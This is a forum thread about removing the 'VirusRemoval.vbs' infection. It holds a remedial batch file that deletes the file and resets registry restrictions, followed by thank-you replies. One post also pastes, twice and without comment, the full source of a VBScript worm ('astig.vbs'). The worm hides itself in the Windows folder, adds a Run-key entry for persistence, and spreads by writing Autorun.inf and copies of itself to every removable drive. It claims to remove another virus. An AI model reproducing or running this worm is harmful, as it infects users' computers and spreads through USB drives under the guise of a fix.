Virus removal. vbs
Solved/Closed
Related:
- Virus removal. vbs
- Goose virus - Download - Other
- Can jpg have virus - Guide
- Online virus scan - Guide
- Bios password removal tool - Download - Other
- Redirecting virus removal - Guide
10 responses
just open your Notepad and type the below code and save it as sajal.bat and put it in your desktop and run it.
cd\
del /a /f /s VirusRemoval.vbs
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /f /d "%windir%\system32\userinit.exe",
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f /d "explorer.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v Hidden /f /d 00000002
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v ShowSuperHidden /f /d 00000001
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v SuperHidden /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v CheckedValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v DefaultValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v CheckedValue /f /d 00000001
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v DefaultValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v CheckedValue /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v DefaultValue /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v UncheckedValue /f /d 00000001
reg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /t Reg_dword /v DisableMSI /f /d 0
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /t Reg_dword /v DisableCMD /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableCMD /f /d 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableConfig /f /d 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableSR /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_Binary /v NoDriveAutoRun /f /d ffffff03
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoDriveTypeAutoRun /f /d 36
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoRun /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\UnreadMail" /t Reg_dword /v MessageExpiryDays /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0
cd\
del /a /f /s VirusRemoval.vbs
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /f /d "%windir%\system32\userinit.exe",
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f /d "explorer.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v Hidden /f /d 00000002
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v ShowSuperHidden /f /d 00000001
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v SuperHidden /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v CheckedValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v DefaultValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v CheckedValue /f /d 00000001
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v DefaultValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v CheckedValue /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v DefaultValue /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v UncheckedValue /f /d 00000001
reg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /t Reg_dword /v DisableMSI /f /d 0
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /t Reg_dword /v DisableCMD /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableCMD /f /d 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableConfig /f /d 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableSR /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_Binary /v NoDriveAutoRun /f /d ffffff03
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoDriveTypeAutoRun /f /d 36
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoRun /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\UnreadMail" /t Reg_dword /v MessageExpiryDays /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0
Hi Sajal,
Thanks for your batch file.
I have used your batch file in my computer. I could remove "virus removal.vbs" error.
Regards,
Amol
Thanks for your batch file.
I have used your batch file in my computer. I could remove "virus removal.vbs" error.
Regards,
Amol
Didn't find the answer you are looking for?
Ask a question
thanx dear sir,i did wat u have guided me to remove the removal.vbs, and surprisingly i worked,thanx agaian.i will need ur valued help in future also,ur great social work via computer is highly be appriciated in all aspect,
yours
gopal agarwalla
yours
gopal agarwalla
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax, pug, pou, kk, hh
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)
If Mid(x, 4) = "astig.vbs" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop
ax = fso.FileExists(win & "\astig.vbs")
Set myFile = fso.CreateTextFile(win & "\astig.vbs", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(win & "\astig.vbs")
fAttr.Attributes=39
wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\astigto", "wscript.exe """ & win & "\astig.vbs"""
If ax = false Then wscr.Run "wscript.exe """ & win & "\astig.vbs"""
While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
End If
Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
auFile.write "[autorun]" & vbCrLf & "open=wscript.exe astig.vbs" & vbCrLf & "shell\Open\Command=wscript.exe astig.vbs" & vbCrLf & "shell\Open\Default=1"
auFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=39
Set hh = fso.CreateTextFile(myFlashDrive.Path & "\ReadMeFirst.txt", true)
hh.write "[DeleteSolutionVirus]" & vbCrLf & "This program is a code of Solution Virus, but " & vbCrLf & "it delete a virus called Solution.vbs" & vbCrLf & "hope you like it folks!" & vbCrLf & "\m/ :-) myRules (-: \m/"
hh.close
Set fAttr = fso.Getfile(myFlashDrive.Path & "\ReadMeFirst.txt")
fAttr.Attributes=32
Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\astig.vbs", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path & "\astig.vbs")
fAttr.Attributes=39
End If
Next
With wscr
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\astigto", "wscript.exe """ & win & "\astig.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
End With
If fso.FileExists(myFlashDrive.Path & "\solution.vbs") Then
kk = fso.Deletefile(myFlashDrive.Path & "\solution.vbs")
End If
If tf <> win & "\astig.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
WScript.Sleep 10000
Wend
Dim fso, wscr, tf, scrText, win, ax, pug, pou, kk, hh
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)
If Mid(x, 4) = "astig.vbs" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop
ax = fso.FileExists(win & "\astig.vbs")
Set myFile = fso.CreateTextFile(win & "\astig.vbs", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(win & "\astig.vbs")
fAttr.Attributes=39
wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\astigto", "wscript.exe """ & win & "\astig.vbs"""
If ax = false Then wscr.Run "wscript.exe """ & win & "\astig.vbs"""
While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
End If
Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
auFile.write "[autorun]" & vbCrLf & "open=wscript.exe astig.vbs" & vbCrLf & "shell\Open\Command=wscript.exe astig.vbs" & vbCrLf & "shell\Open\Default=1"
auFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=39
Set hh = fso.CreateTextFile(myFlashDrive.Path & "\ReadMeFirst.txt", true)
hh.write "[DeleteSolutionVirus]" & vbCrLf & "This program is a code of Solution Virus, but " & vbCrLf & "it delete a virus called Solution.vbs" & vbCrLf & "hope you like it folks!" & vbCrLf & "\m/ :-) myRules (-: \m/"
hh.close
Set fAttr = fso.Getfile(myFlashDrive.Path & "\ReadMeFirst.txt")
fAttr.Attributes=32
Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\astig.vbs", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path & "\astig.vbs")
fAttr.Attributes=39
End If
Next
With wscr
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\astigto", "wscript.exe """ & win & "\astig.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
End With
If fso.FileExists(myFlashDrive.Path & "\solution.vbs") Then
kk = fso.Deletefile(myFlashDrive.Path & "\solution.vbs")
End If
If tf <> win & "\astig.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
WScript.Sleep 10000
Wend
Ambucias
Posts
47356
Registration date
Monday February 1, 2010
Status
Moderator
Last seen
February 15, 2023
11,171
Jul 16, 2010 at 04:41 PM
Jul 16, 2010 at 04:41 PM
Hello Wilhelm
The solution was already provided to you! Please use the batch file provided by another user in this thread which was a succesful solution.
Regards
The solution was already provided to you! Please use the batch file provided by another user in this thread which was a succesful solution.
Regards
Sep 20, 2008 at 03:41 AM
Oct 26, 2008 at 02:20 AM
i was suffered from the virus removal.vbs for many days.
today i got the solution provided by u on yahoo group.and i did wat u directed it works but yet i am not confirmed that it works.anyways thanx very much.hope i can get more solutions from you.
Dec 5, 2008 at 06:54 AM
Thanks dear for ur solution for removal.vbs , thnks i got rid of that problem
Dec 14, 2008 at 01:03 PM
Iam really very very thankfull to you,bcoz i 2 got rid of this problem.Can i get your email-id.
Thanks,
Rajeev
Oct 10, 2009 at 10:05 PM
yaar u r genius .ur .bat file trick 100% working for me.i was very need.Lagge raho munna bhai.........................